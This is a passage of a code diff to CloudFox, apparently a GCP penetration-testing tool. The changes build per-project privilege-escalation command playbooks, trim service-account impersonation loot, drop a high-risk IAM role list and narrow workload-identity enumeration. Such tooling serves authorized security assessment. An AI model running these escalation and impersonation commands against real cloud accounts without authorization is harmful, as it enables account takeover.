m.FoxMapperCache.GetService().GetNode(bestPath.Destination) + } + + switch bestPath.AdminLevel { + case "org": + privescAdminLevel = "Org" + case "folder": + if destNode != nil && len(destNode.IAMBindings) > 0 { + for _, binding := range destNode.IAMBindings { + if resource, ok := binding["resource"].(string); ok { + if strings.HasPrefix(resource, "folders/") { + folderID := strings.TrimPrefix(resource, "folders/") + privescAdminLevel = fmt.Sprintf("Folder: %s", folderID) + break + } + } + } + } + if privescAdminLevel == "-" { + privescAdminLevel = "Folder" + } + case "project": + if destNode != nil && destNode.ProjectID != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destNode.ProjectID) + } else { + destProject := extractProjectFromPrincipal(bestPath.Destination, m.OrgCache) + if destProject != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destProject) + } else { + privescAdminLevel = "Project" + } + } + default: + privescAdminLevel = bestPath.AdminLevel + } + } + + body = append(body, []string{ + displayProject, + f.MemberType, + f.Principal, + isAdmin, + adminLevel, + privescTo, + privescAdminLevel, + hops, + permission, + }) } + return body } -func (m *PrivescModule) collectLootFiles() []internal.LootFile { - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox using FoxMapper graph data\n\n") { - lootFiles = append(lootFiles, *loot) +// generatePlaybookForProject generates a loot file specific to a project +func (m *PrivescModule) generatePlaybookForProject(projectID string) *internal.LootFile { + findings := m.findingsForProject(projectID) + if len(findings) == 0 { + return nil + } + + var sb strings.Builder + sb.WriteString("# GCP Privilege Escalation Commands\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + sb.WriteString("# Generated by CloudFox using FoxMapper graph data\n\n") + + // Group findings by admin level reachable + var orgPaths, folderPaths, projectPaths []foxmapperservice.PrivescFinding + + for _, f := range findings { + if f.IsAdmin || !f.CanEscalate { + continue + } + switch f.HighestAdminLevel { + case "org": + orgPaths = append(orgPaths, f) + case "folder": + folderPaths = append(folderPaths, f) + case "project": + projectPaths = append(projectPaths, f) + } + } + + if len(orgPaths) > 0 { + sb.WriteString("# =============================================================================\n") + sb.WriteString("# CRITICAL: Organization Admin Reachable\n") + sb.WriteString("# =============================================================================\n\n") + for _, f := range orgPaths { + m.writePrivescFindingToPlaybook(&sb, f) } } - return lootFiles + + if len(folderPaths) > 0 { + sb.WriteString("# =============================================================================\n") + sb.WriteString("# HIGH: Folder Admin Reachable\n") + sb.WriteString("# =============================================================================\n\n") + for _, f := range folderPaths { + m.writePrivescFindingToPlaybook(&sb, f) + } + } + + if len(projectPaths) > 0 { + sb.WriteString("# =============================================================================\n") + sb.WriteString("# MEDIUM: Project Admin Reachable\n") + sb.WriteString("# =============================================================================\n\n") + for _, f := range projectPaths { + m.writePrivescFindingToPlaybook(&sb, f) + } + } + + contents := sb.String() + // Check if empty (just header) + headerOnly := fmt.Sprintf("# GCP Privilege Escalation Commands\n# Project: %s\n# Generated by CloudFox using FoxMapper graph data\n\n", projectID) + if contents == headerOnly { + return nil + } + + return &internal.LootFile{ + Name: "privesc-commands", + Contents: contents, + } } func (m *PrivescModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { outputData := internal.HierarchicalOutputData{ OrgLevelData: make(map[string]internal.CloudfoxOutput), + FolderLevelData: make(map[string]internal.CloudfoxOutput), ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - // Determine scope - use org if available, otherwise first project - scopeID := "" - if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { - scopeID = m.Hierarchy.Organizations[0].ID - } else if len(m.ProjectIDs) > 0 { - scopeID = m.ProjectIDs[0] - } + // Process each specified project + for _, projectID := range m.ProjectIDs { + var tableFiles []internal.TableFile - if scopeID != "" { - tables := m.buildAllTables() - lootFiles := m.collectLootFiles() + // Build table for this project + body := m.findingsToTableBodyForProject(projectID) + if len(body) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "privesc-permissions", + Header: m.getHeader(), + Body: body, + }) + } - // Use org level data if we have org scope - if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { - outputData.OrgLevelData[scopeID] = PrivescOutput{Table: tables, Loot: lootFiles} - } else { - outputData.ProjectLevelData[scopeID] = PrivescOutput{Table: tables, Loot: lootFiles} + // Generate loot file for this project + var lootFiles []internal.LootFile + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil { + lootFiles = append(lootFiles, *playbook) } + + // Always add project to output (even if empty) + outputData.ProjectLevelData[projectID] = PrivescOutput{Table: tableFiles, Loot: lootFiles} } pathBuilder := m.BuildPathBuilder() @@ -505,36 +845,43 @@ func (m *PrivescModule) writeHierarchicalOutput(ctx context.Context, logger inte } func (m *PrivescModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { - tables := m.buildAllTables() - lootFiles := m.collectLootFiles() - - output := PrivescOutput{Table: tables, Loot: lootFiles} + var tables []internal.TableFile - // Determine output scope - var scopeType string - var scopeIdentifiers []string - var scopeNames []string + // Build table with all findings + if len(m.Findings) > 0 { + tables = append(tables, internal.TableFile{ + Name: "privesc-permissions", + Header: m.getHeader(), + Body: m.findingsToTableBody(), + }) + } - if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { - scopeType = "organization" - scopeIdentifiers = []string{m.Hierarchy.Organizations[0].ID} - scopeNames = []string{m.Hierarchy.Organizations[0].DisplayName} - } else { - scopeType = "project" - scopeIdentifiers = m.ProjectIDs - for _, id := range m.ProjectIDs { - scopeNames = append(scopeNames, m.GetProjectName(id)) + // Generate per-project playbooks + var lootFiles []internal.LootFile + for _, projectID := range m.ProjectIDs { + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil { + // Rename to include project for flat output + playbook.Name = fmt.Sprintf("privesc-commands-%s", projectID) + lootFiles = append(lootFiles, *playbook) } } + output := PrivescOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - scopeType, - scopeIdentifiers, + "project", + m.ProjectIDs, scopeNames, m.Account, output, diff --git a/gcp/commands/serviceaccounts.go b/gcp/commands/serviceaccounts.go index 5d3ffae5..71efddad 100644 --- a/gcp/commands/serviceaccounts.go +++ b/gcp/commands/serviceaccounts.go @@ -337,51 +337,38 @@ func (m *ServiceAccountsModule) addServiceAccountToLoot(projectID string, sa Ser keyFileName := strings.Split(sa.Email, "@")[0] - // Build summary info - dwdStatus := "No" - if sa.OAuth2ClientID != "" { - dwdStatus = fmt.Sprintf("Yes (Client ID: %s)", sa.OAuth2ClientID) - } - - defaultSAInfo := "No" - if sa.IsDefaultSA { - defaultSAInfo = fmt.Sprintf("Yes (%s)", sa.DefaultSAType) - } - lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# SERVICE ACCOUNT: %s\n"+ - "# ==========================================\n"+ - "# Project: %s\n"+ - "# Display Name: %s\n"+ - "# Disabled: %v\n"+ - "# Default SA: %s\n"+ - "# DWD Enabled: %s\n", + "# ==========================================\n", sa.Email, - projectID, - sa.DisplayName, - sa.Disabled, - defaultSAInfo, - dwdStatus, ) - // Add key summary + if sa.DisplayName != "" { + lootFile.Contents += fmt.Sprintf("# Display Name: %s\n", sa.DisplayName) + } + if sa.Disabled { + lootFile.Contents += "# DISABLED\n" + } + if sa.IsDefaultSA { + lootFile.Contents += fmt.Sprintf("# Default SA: %s\n", sa.DefaultSAType) + } + if sa.OAuth2ClientID != "" { + lootFile.Contents += fmt.Sprintf("# DWD Enabled (Client ID: %s)\n", sa.OAuth2ClientID) + } + + // Add key summary - only show if keys exist userKeyCount := 0 - googleKeyCount := 0 for _, key := range sa.Keys { if key.KeyType == "USER_MANAGED" { userKeyCount++ - } else if key.KeyType == "SYSTEM_MANAGED" { - googleKeyCount++ } } - lootFile.Contents += fmt.Sprintf("# User Managed Keys: %d\n", userKeyCount) - lootFile.Contents += fmt.Sprintf("# Google Managed Keys: %d\n", googleKeyCount) - if sa.OldestKeyAge > 0 { - lootFile.Contents += fmt.Sprintf("# Oldest Key Age: %d days\n", sa.OldestKeyAge) - if sa.OldestKeyAge > 90 { - lootFile.Contents += "# WARNING: Key older than 90 days - rotation recommended\n" - } + if userKeyCount > 0 { + lootFile.Contents += fmt.Sprintf("# User Managed Keys: %d\n", userKeyCount) + } + if sa.OldestKeyAge > 90 { + lootFile.Contents += fmt.Sprintf("# WARNING: Key older than 90 days (%d days)\n", sa.OldestKeyAge) } // Add impersonation info if available @@ -455,28 +442,6 @@ gcloud projects list --impersonate-service-account=%s `, sa.OAuth2ClientID, projectID, keyFileName) } - // Add section for old keys - if sa.HasOldKeys { - lootFile.Contents += fmt.Sprintf(`# === KEY ROTATION === -# This SA has keys older than 90 days (%d days) - -# List keys with age -gcloud iam service-accounts keys list --iam-account=%s --project=%s --format='table(name.basename(), keyType, validAfterTime, validBeforeTime)' - -`, sa.OldestKeyAge, sa.Email, projectID) - } - - // Add section for default SA - if sa.IsDefaultSA { - lootFile.Contents += fmt.Sprintf(`# === DEFAULT SERVICE ACCOUNT === -# This is a %s default service account - -# Check roles granted to this SA -gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains("%s")) | .role' - -`, sa.DefaultSAType, projectID, sa.Email) - } - lootFile.Contents += "\n" } diff --git a/gcp/commands/serviceagents.go b/gcp/commands/serviceagents.go index 84dfd71a..1a692059 100644 --- a/gcp/commands/serviceagents.go +++ b/gcp/commands/serviceagents.go @@ -49,10 +49,11 @@ TIP: Run foxmapper first to populate the Attack Paths column with privesc/exfil/ type ServiceAgentsModule struct { gcpinternal.BaseGCPModule - ProjectAgents map[string][]serviceagentsservice.ServiceAgentInfo // projectID -> agents - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper analysis results - mu sync.Mutex + ProjectAgents map[string][]serviceagentsservice.ServiceAgentInfo // projectID -> agents + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper analysis results + OrgCache *gcpinternal.OrgCache + mu sync.Mutex } // ------------------------------ @@ -91,6 +92,9 @@ func (m *ServiceAgentsModule) Execute(ctx context.Context, logger internal.Logge // Get FoxMapper cache from context m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + // Get OrgCache for project number resolution + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEAGENTS_MODULE_NAME, m.processProject) allAgents := m.getAllAgents() @@ -134,7 +138,7 @@ func (m *ServiceAgentsModule) processProject(ctx context.Context, projectID stri } svc := serviceagentsservice.New() - agents, err := svc.GetServiceAgents(projectID) + agents, err := svc.GetServiceAgents(projectID, m.OrgCache) if err != nil { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.ErrorM(fmt.Sprintf("Error getting service agents: %v", err), globals.GCP_SERVICEAGENTS_MODULE_NAME) @@ -178,32 +182,17 @@ func (m *ServiceAgentsModule) addAgentToLoot(projectID string, agent serviceagen crossProjectNote = " [CROSS-PROJECT from " + agent.SourceProject + "]" } - // Check for high-risk roles - var highRiskRoles []string - for _, role := range agent.Roles { - riskLevel := getRiskLevel(role) - if riskLevel != "-" { - highRiskRoles = append(highRiskRoles, riskLevel) - } - } - - highRiskNote := "" - if len(highRiskRoles) > 0 { - highRiskNote = " [HIGH RISK: " + strings.Join(highRiskRoles, ", ") + "]" - } - lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ - "# SERVICE AGENT: %s%s%s\n"+ + "# SERVICE AGENT: %s%s\n"+ "# ==========================================\n"+ "# Email: %s\n"+ - "# Project: %s\n"+ "# Description: %s\n", - agent.ServiceName, crossProjectNote, highRiskNote, - agent.Email, agent.ProjectID, agent.Description, + agent.ServiceName, crossProjectNote, + agent.Email, agent.Description, ) - if agent.SourceProject != "" { + if agent.IsCrossProject && agent.SourceProject != "" { lootFile.Contents += fmt.Sprintf("# Source Project: %s\n", agent.SourceProject) } @@ -243,26 +232,6 @@ func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.L } } -// High-risk roles that grant significant privileges -var highRiskRoles = map[string]bool{ - "roles/owner": true, - "roles/editor": true, - "roles/iam.serviceAccountAdmin": true, - "roles/iam.serviceAccountKeyAdmin": true, - "roles/iam.serviceAccountTokenCreator": true, - "roles/iam.serviceAccountUser": true, - "roles/iam.workloadIdentityUser": true, - "roles/compute.admin": true, - "roles/compute.instanceAdmin": true, - "roles/container.admin": true, - "roles/cloudbuild.builds.editor": true, - "roles/cloudfunctions.admin": true, - "roles/run.admin": true, - "roles/storage.admin": true, - "roles/secretmanager.admin": true, - "roles/cloudkms.admin": true, -} - // getHeader returns the table header func (m *ServiceAgentsModule) getHeader() []string { return []string{ @@ -272,71 +241,11 @@ func (m *ServiceAgentsModule) getHeader() []string { "Source Project", "Cross-Project", "Role", - "Risk", "Attack Paths", "Description", } } -// getRiskLevel returns the risk level for a role -// Returns the risk reason if high risk, or "-" if not -func getRiskLevel(role string) string { - // Check known high-risk roles - riskReasons := map[string]string{ - "roles/owner": "Owner", - "roles/editor": "Editor", - "roles/iam.serviceAccountAdmin": "SA Admin", - "roles/iam.serviceAccountKeyAdmin": "Key Admin", - "roles/iam.serviceAccountTokenCreator": "Token Creator", - "roles/iam.serviceAccountUser": "SA User", - "roles/iam.workloadIdentityUser": "Workload ID", - "roles/compute.admin": "Compute Admin", - "roles/compute.instanceAdmin": "Instance Admin", - "roles/compute.instanceAdmin.v1": "Instance Admin", - "roles/container.admin": "GKE Admin", - "roles/container.clusterAdmin": "Cluster Admin", - "roles/cloudbuild.builds.editor": "Build Editor", - "roles/cloudfunctions.admin": "Functions Admin", - "roles/run.admin": "Run Admin", - "roles/storage.admin": "Storage Admin", - "roles/secretmanager.admin": "Secrets Admin", - "roles/cloudkms.admin": "KMS Admin", - "roles/bigquery.admin": "BigQuery Admin", - "roles/pubsub.admin": "Pub/Sub Admin", - "roles/logging.admin": "Logging Admin", - "roles/resourcemanager.projectIamAdmin": "IAM Admin", - "roles/resourcemanager.folderAdmin": "Folder Admin", - "roles/resourcemanager.organizationAdmin": "Org Admin", - } - - if reason, ok := riskReasons[role]; ok { - return reason - } - - // Check for admin/owner patterns - if strings.HasSuffix(role, ".admin") { - // Extract service name for cleaner output - parts := strings.Split(role, "/") - if len(parts) == 2 { - serviceParts := strings.Split(parts[1], ".") - if len(serviceParts) > 0 { - // Capitalize first letter - name := serviceParts[0] - if len(name) > 0 { - return strings.ToUpper(name[:1]) + name[1:] + " Admin" - } - } - } - return "Admin Role" - } - - if strings.Contains(role, "Admin") { - return "Admin Role" - } - - return "-" -} - // writeHierarchicalOutput writes output to per-project directories func (m *ServiceAgentsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { header := m.getHeader() @@ -464,8 +373,6 @@ func (m *ServiceAgentsModule) agentsToTableBody(agents []serviceagentsservice.Se // One row per role if len(agent.Roles) > 0 { for _, role := range agent.Roles { - riskLevel := getRiskLevel(role) - body = append(body, []string{ m.GetProjectName(agent.ProjectID), agent.ServiceName, @@ -473,7 +380,6 @@ func (m *ServiceAgentsModule) agentsToTableBody(agents []serviceagentsservice.Se sourceProject, crossProject, role, - riskLevel, attackPaths, agent.Description, }) @@ -487,7 +393,6 @@ func (m *ServiceAgentsModule) agentsToTableBody(agents []serviceagentsservice.Se sourceProject, crossProject, "-", - "-", attackPaths, agent.Description, }) diff --git a/gcp/commands/workloadidentity.go b/gcp/commands/workloadidentity.go index 478b6fcb..995e0298 100644 --- a/gcp/commands/workloadidentity.go +++ b/gcp/commands/workloadidentity.go @@ -8,18 +8,18 @@ import ( gkeservice "github.com/BishopFox/cloudfox/gcp/services/gkeService" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" - workloadidentityservice "github.com/BishopFox/cloudfox/gcp/services/workloadIdentityService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" + iam "google.golang.org/api/iam/v1" ) var GCPWorkloadIdentityCommand = &cobra.Command{ Use: globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, Aliases: []string{"wi", "gke-identity", "workload-id"}, - Short: "Enumerate GKE Workload Identity and Workload Identity Federation", - Long: `Enumerate Workload Identity configurations including GKE bindings and external identity federation. + Short: "Enumerate GKE Workload Identity (K8s SA -> GCP SA bindings)", + Long: `Enumerate GKE Workload Identity configurations and K8s-to-GCP service account bindings. Features: - Lists GKE clusters with Workload Identity enabled @@ -28,27 +28,29 @@ Features: - Maps namespace/service account to GCP permissions - Detects overly permissive bindings -Workload Identity Federation (External Identities): -- Lists Workload Identity Pools and Providers -- Analyzes AWS, OIDC (GitHub Actions, GitLab CI), and SAML providers -- Identifies risky provider configurations (missing attribute conditions) -- Shows federated identity bindings to GCP service accounts -- Generates exploitation commands for pentesting`, +Security Considerations: +- K8s pods with Workload Identity inherit all permissions of the bound GCP SA +- High-privilege GCP SAs bound to K8s SAs are prime escalation targets +- Any pod in the namespace/SA can assume the GCP identity + +TIP: Run 'identity-federation' to enumerate external identity federation (GitHub Actions, AWS, GitLab CI, etc.). +TIP: Run 'gke' to see full cluster security configuration and node pool details. +TIP: Run foxmapper first to populate the Attack Paths column with privesc/exfil/lateral movement analysis.`, Run: runGCPWorkloadIdentityCommand, } // WorkloadIdentityBinding represents a binding between K8s SA and GCP SA type WorkloadIdentityBinding struct { - ProjectID string `json:"projectId"` - ClusterName string `json:"clusterName"` - ClusterLocation string `json:"clusterLocation"` - WorkloadPool string `json:"workloadPool"` - KubernetesNS string `json:"kubernetesNamespace"` - KubernetesSA string `json:"kubernetesServiceAccount"` - GCPServiceAccount string `json:"gcpServiceAccount"` - GCPSARoles []string `json:"gcpServiceAccountRoles"` - IsHighPrivilege bool `json:"isHighPrivilege"` - BindingType string `json:"bindingType"` // "workloadIdentityUser" or "other" + ProjectID string `json:"projectId"` + ClusterName string `json:"clusterName"` + ClusterLocation string `json:"clusterLocation"` + WorkloadPool string `json:"workloadPool"` + KubernetesNS string `json:"kubernetesNamespace"` + KubernetesSA string `json:"kubernetesServiceAccount"` + GCPServiceAccount string `json:"gcpServiceAccount"` + GCPSARoles []string `json:"gcpServiceAccountRoles"` + IsHighPrivilege bool `json:"isHighPrivilege"` + BindingType string `json:"bindingType"` // "workloadIdentityUser" or "other" } // ClusterWorkloadIdentity represents a cluster's workload identity configuration @@ -63,24 +65,20 @@ type ClusterWorkloadIdentity struct { } // ------------------------------ -// Module Struct with embedded BaseGCPModule +// Module Struct // ------------------------------ type WorkloadIdentityModule struct { gcpinternal.BaseGCPModule - // Module-specific fields (GKE Workload Identity) - per-project for hierarchical output - ProjectClusters map[string][]ClusterWorkloadIdentity // projectID -> clusters - ProjectBindings map[string][]WorkloadIdentityBinding // projectID -> bindings - ProjectPools map[string][]workloadidentityservice.WorkloadIdentityPool // projectID -> pools - ProjectProviders map[string][]workloadidentityservice.WorkloadIdentityProvider // projectID -> providers - ProjectFederatedBindings map[string][]workloadidentityservice.FederatedIdentityBinding // projectID -> federated bindings - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper cache for attack path analysis - mu sync.Mutex + ProjectClusters map[string][]ClusterWorkloadIdentity // projectID -> clusters + ProjectBindings map[string][]WorkloadIdentityBinding // projectID -> bindings + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache + mu sync.Mutex } // ------------------------------ -// Output Struct implementing CloudfoxOutput interface +// Output Struct // ------------------------------ type WorkloadIdentityOutput struct { Table []internal.TableFile @@ -94,24 +92,18 @@ func (o WorkloadIdentityOutput) LootFiles() []internal.LootFile { return o.Loo // Command Entry Point // ------------------------------ func runGCPWorkloadIdentityCommand(cmd *cobra.Command, args []string) { - // Initialize command context cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) if err != nil { - return // Error already logged + return } - // Create module instance module := &WorkloadIdentityModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - ProjectClusters: make(map[string][]ClusterWorkloadIdentity), - ProjectBindings: make(map[string][]WorkloadIdentityBinding), - ProjectPools: make(map[string][]workloadidentityservice.WorkloadIdentityPool), - ProjectProviders: make(map[string][]workloadidentityservice.WorkloadIdentityProvider), - ProjectFederatedBindings: make(map[string][]workloadidentityservice.FederatedIdentityBinding), - LootMap: make(map[string]map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectClusters: make(map[string][]ClusterWorkloadIdentity), + ProjectBindings: make(map[string][]WorkloadIdentityBinding), + LootMap: make(map[string]map[string]*internal.LootFile), } - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -119,54 +111,34 @@ func runGCPWorkloadIdentityCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *WorkloadIdentityModule) Execute(ctx context.Context, logger internal.Logger) { - // Get FoxMapper cache from context m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { logger.InfoM("Using FoxMapper cache for attack path analysis", globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) } - // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, m.processProject) - // Get all data for stats allClusters := m.getAllClusters() allBindings := m.getAllBindings() - allPools := m.getAllPools() - allProviders := m.getAllProviders() - allFederatedBindings := m.getAllFederatedBindings() - - // Check if we have any findings - hasGKE := len(allClusters) > 0 - hasFederation := len(allPools) > 0 - if !hasGKE && !hasFederation { - logger.InfoM("No Workload Identity configurations found", globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + if len(allClusters) == 0 { + logger.InfoM("No GKE clusters found", globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) return } - // Count GKE clusters with Workload Identity - if hasGKE { - wiEnabled := 0 - for _, c := range allClusters { - if c.WorkloadPoolEnabled { - wiEnabled++ - } + wiEnabled := 0 + for _, c := range allClusters { + if c.WorkloadPoolEnabled { + wiEnabled++ } - logger.SuccessM(fmt.Sprintf("Found %d GKE cluster(s) (%d with Workload Identity), %d K8s->GCP binding(s)", - len(allClusters), wiEnabled, len(allBindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) } + logger.SuccessM(fmt.Sprintf("Found %d GKE cluster(s) (%d with Workload Identity), %d K8s->GCP binding(s)", + len(allClusters), wiEnabled, len(allBindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) - // Count federation findings - if hasFederation { - logger.SuccessM(fmt.Sprintf("Found %d Workload Identity Pool(s), %d Provider(s), %d federated binding(s)", - len(allPools), len(allProviders), len(allFederatedBindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) - } - - // Write output m.writeOutput(ctx, logger) } -// getAllClusters returns all clusters from all projects (for statistics) +// getAllClusters returns all clusters from all projects func (m *WorkloadIdentityModule) getAllClusters() []ClusterWorkloadIdentity { var all []ClusterWorkloadIdentity for _, clusters := range m.ProjectClusters { @@ -175,7 +147,7 @@ func (m *WorkloadIdentityModule) getAllClusters() []ClusterWorkloadIdentity { return all } -// getAllBindings returns all bindings from all projects (for statistics) +// getAllBindings returns all bindings from all projects func (m *WorkloadIdentityModule) getAllBindings() []WorkloadIdentityBinding { var all []WorkloadIdentityBinding for _, bindings := range m.ProjectBindings { @@ -184,56 +156,26 @@ func (m *WorkloadIdentityModule) getAllBindings() []WorkloadIdentityBinding { return all } -// getAllPools returns all pools from all projects (for statistics) -func (m *WorkloadIdentityModule) getAllPools() []workloadidentityservice.WorkloadIdentityPool { - var all []workloadidentityservice.WorkloadIdentityPool - for _, pools := range m.ProjectPools { - all = append(all, pools...) - } - return all -} - -// getAllProviders returns all providers from all projects (for statistics) -func (m *WorkloadIdentityModule) getAllProviders() []workloadidentityservice.WorkloadIdentityProvider { - var all []workloadidentityservice.WorkloadIdentityProvider - for _, providers := range m.ProjectProviders { - all = append(all, providers...) - } - return all -} - -// getAllFederatedBindings returns all federated bindings from all projects (for statistics) -func (m *WorkloadIdentityModule) getAllFederatedBindings() []workloadidentityservice.FederatedIdentityBinding { - var all []workloadidentityservice.FederatedIdentityBinding - for _, bindings := range m.ProjectFederatedBindings { - all = append(all, bindings...) - } - return all -} - // ------------------------------ -// Project Processor (called concurrently for each project) +// Project Processor // ------------------------------ func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Enumerating Workload Identity in project: %s", projectID), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Enumerating GKE Workload Identity in project: %s", projectID), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) } - // ========================================== - // Part 1: GKE Workload Identity - // ========================================== gkeSvc := gkeservice.New() clusters, _, err := gkeSvc.Clusters(projectID) if err != nil { gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, fmt.Sprintf("Could not enumerate GKE clusters in project %s", projectID)) + return } var clusterInfos []ClusterWorkloadIdentity var bindings []WorkloadIdentityBinding for _, cluster := range clusters { - // Analyze cluster Workload Identity configuration cwi := ClusterWorkloadIdentity{ ProjectID: projectID, ClusterName: cluster.Name, @@ -241,14 +183,11 @@ func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID s TotalNodePools: cluster.NodePoolCount, } - // Check if Workload Identity is enabled at cluster level if cluster.WorkloadIdentity != "" { cwi.WorkloadPoolEnabled = true cwi.WorkloadPool = cluster.WorkloadIdentity } - // Node pools with WI is not tracked individually in ClusterInfo - // Just mark all as WI-enabled if cluster has WI if cwi.WorkloadPoolEnabled { cwi.NodePoolsWithWI = cwi.TotalNodePools } @@ -262,45 +201,9 @@ func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID s } } - // ========================================== - // Part 2: Workload Identity Federation - // ========================================== - wiSvc := workloadidentityservice.New() - - // Get Workload Identity Pools - pools, err := wiSvc.ListWorkloadIdentityPools(projectID) - if err != nil { - gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, - fmt.Sprintf("Could not list Workload Identity Pools in project %s", projectID)) - } - - var providers []workloadidentityservice.WorkloadIdentityProvider - - // Get providers for each pool - for _, pool := range pools { - poolProviders, err := wiSvc.ListWorkloadIdentityProviders(projectID, pool.PoolID) - if err != nil { - gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, - fmt.Sprintf("Could not list providers for pool %s", pool.PoolID)) - continue - } - providers = append(providers, poolProviders...) - } - - // Find federated identity bindings - fedBindings, err := wiSvc.FindFederatedIdentityBindings(projectID, pools) - if err != nil { - gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, - fmt.Sprintf("Could not find federated identity bindings in project %s", projectID)) - } - - // Thread-safe append m.mu.Lock() m.ProjectClusters[projectID] = clusterInfos m.ProjectBindings[projectID] = bindings - m.ProjectPools[projectID] = pools - m.ProjectProviders[projectID] = providers - m.ProjectFederatedBindings[projectID] = fedBindings // Initialize loot for this project if m.LootMap[projectID] == nil { @@ -311,35 +214,25 @@ func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID s } } - // Generate loot for _, cwi := range clusterInfos { m.addClusterToLoot(projectID, cwi) } for _, binding := range bindings { m.addBindingToLoot(projectID, binding) } - for _, pool := range pools { - m.addPoolToLoot(projectID, pool) - } - for _, provider := range providers { - m.addProviderToLoot(projectID, provider) - } - for _, fedBinding := range fedBindings { - m.addFederatedBindingToLoot(projectID, fedBinding) - } m.mu.Unlock() if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Found %d GKE cluster(s), %d K8s binding(s), %d pool(s), %d provider(s) in project %s", - len(clusterInfos), len(bindings), len(pools), len(providers), projectID), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Found %d GKE cluster(s), %d K8s binding(s) in project %s", + len(clusterInfos), len(bindings), projectID), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) } } // findWorkloadIdentityBindings finds all IAM bindings that grant workloadIdentityUser role +// by querying the IAM policy ON each service account (resource-level, not project-level) func (m *WorkloadIdentityModule) findWorkloadIdentityBindings(ctx context.Context, projectID, clusterName, location, workloadPool string, logger internal.Logger) []WorkloadIdentityBinding { var bindings []WorkloadIdentityBinding - // Get all service accounts in the project and check their IAM policies (without keys) iamSvc := IAMService.New() serviceAccounts, err := iamSvc.ServiceAccountsBasic(projectID) if err != nil { @@ -348,21 +241,25 @@ func (m *WorkloadIdentityModule) findWorkloadIdentityBindings(ctx context.Contex return bindings } - // For each service account, get its IAM policy and look for workloadIdentityUser bindings + // Get an IAM service client for SA-level policy queries + iamService, err := iam.NewService(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + "Could not create IAM service client") + return bindings + } + for _, sa := range serviceAccounts { - // Get IAM policy for this service account - // The workloadIdentityUser role is 